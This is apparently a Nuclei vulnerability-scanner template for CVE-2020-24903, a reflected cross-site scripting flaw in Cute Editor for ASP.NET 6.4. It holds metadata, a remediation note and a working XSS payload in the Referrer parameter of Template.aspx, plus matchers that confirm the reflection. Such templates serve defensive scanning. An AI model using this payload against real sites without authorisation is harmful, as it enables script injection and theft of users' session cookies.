id: CVE-2020-24903

info:
  name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  remediation: |
    Upgrade to a patched version of Cute Editor for ASP.NET or implement proper input validation to prevent XSS attacks.
  reference:
    - https://seclists.org/bugtraq/2016/Mar/104
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24903
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-24903
    cwe-id: CWE-79
    epss-score: 0.00262
    epss-percentile: 0.63699
    cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cutesoft
    product: cute_editor
    framework: asp.net
    shodan-query: http.component:"ASP.NET"
  tags: cve,cve2020,cuteeditor,xss,seclists

http:
  - method: GET
    path:
      - '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script></p>"
          - "System.Web"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a0046304402207b6150bf3cafa28311f29d3b66d772f9856d1549ed192f9547671ed8fc74ba3e022069a32401aad6f804289512e0cf90a09cced4a3361407184729a3e2526b8ec468:922c64590222798bb761d5b6d8e72950